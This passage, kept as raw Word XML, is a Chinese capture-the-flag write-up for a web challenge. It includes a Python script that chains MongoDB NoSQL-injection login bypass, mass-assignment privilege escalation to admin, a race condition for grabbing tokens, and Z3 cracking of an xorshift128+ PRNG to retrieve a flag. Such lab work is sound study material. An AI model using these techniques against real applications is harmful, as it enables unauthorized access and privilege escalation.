          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">于是故技重施即可：调用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/dui/update</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将自身的标识覆盖成能够号令全局的主管理员/掌门级别：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"掌门"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"zhen"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伴随着此次关键级别的上调，重新补上预测结果并敲击回车，就可以直接召唤出通关凭证的旗帜。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="15"/>
    <w:bookmarkStart w:id="16" w:name="header-n73"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">全流程攻防剧本代码实现</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为提高效率，编写了这套自动运行脚本，它可以依次执行：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利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MongoDB NoSQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">突破校验防线登录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发送恶意</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Mass assignment </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">并提升个人状态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引发内存竞态一键劫持充沛的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> token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挂起心跳等待</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/zhen/history</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">刷新足量多达</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 12 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">份数据源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调用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Z3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的方程约束模块穷举推算出</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PRNG </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">核心空间以定下当前值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赋予</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> admin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的最后跨越指令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向</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/zhen/predict</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">递交正确密钥并打印出</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> flag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urllib.error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urllib.request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concurrent.futures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ThreadPoolExecutor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http.cookiejar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CookieJar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z3</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/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"http://39.105.213.28:14509"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">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.jar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CookieJar()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.opener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urllib.request.build_opener(</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            urllib.request.HTTPCookieProcessor(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.jar)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json.dumps(data, separators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)).encode()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            headers[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   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urllib.request.Request(BASE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path,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body,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.opener.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(req,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r.status, r.read().decode(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"replace"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urllib.error.HTTPError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e.code, e.read().decode(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"replace"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xs128p(s0, s1):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MASK, s1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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">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MASK, 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xs128p_z3(s0, s1):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s0, s1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    ns0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z3.LShR(x,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z3.LShR(y,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ns0, x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bounds(n, bits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denom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bits</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">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denom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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">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denom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lo, hi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solve_next(history):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    observed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[h[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(history)]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">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z3.BitVec(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"s0"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z3.BitVec(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"s1"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z3.Solver()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    cur0, cur1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s0, s1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(observed):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z3.Extract(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cur0)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        lo,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bounds(n)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        solver.add(z3.UGE(top, z3.BitVecVal(lo, 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solver.add(z3.ULE(top, z3.BitVecVal(hi, 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(observed)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cur0, cur1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xs128p_z3(cur0, cur1)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solver.check()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z3.sat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solver.model()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(s0).as_long()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(s1).as_long()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(observed)):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    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xs128p(a, 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((a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NoSQL injection login</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    st, txt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c.request(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"/qian/login"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"qingyun"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"$nin"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"[login]"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, st, txt)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mass assignment -&gt; elder</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    c.request(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"/dui/update"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"elder"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"elder"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"rank"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"elder"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"elder"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"permission"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"permissions"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"li"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"zhen"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race /li/grab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grab():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c.request(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"/li/grab"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ThreadPoolExecutor(max_workers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pool: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st, txt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pool.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_: grab(),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json.loads(txt)[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tokens.append(tok)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"[token]"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, tok)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(tokens)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(tokens)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tokens[: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wait for enough PRNG outputs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st, txt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c.request(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"/zhen/history"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json.loads(txt)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"[history]"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"current_round"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]), data[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"remaining_ms"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"remaining_ms"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guess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solve_next(data[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round_no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"current_round"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"[guess]"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, round_no, guess)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5: final admin gate</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    c.request(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"/dui/update"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"掌门"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"rank"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"permission"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"permissions"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"li"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"zhen"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"isAdmin"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"is_admin"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st, txt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c.request(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"/zhen/predict"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: round_no,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: guess,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"tokens"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: tokens,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"[result]"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, st, txt)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16"/>
    <w:bookmarkStart w:id="17" w:name="header-n91"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务端回显与执行成果</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">待漏洞脚本走完既定全集并校验之后，会返回代表成功的报文提示：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"🎴 卦象大吉！内殿大门已开"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"ISCC{bagua_MYQH1826B5gEJLo}"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"恭喜少侠得见祖师真容"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="17"/>
    <w:bookmarkStart w:id="18" w:name="header-n94"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">取得</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Flag</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ISCC{bagua_MYQH1826B5gEJLo}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2026-05-18T15:36:03Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-18T15:36:03Z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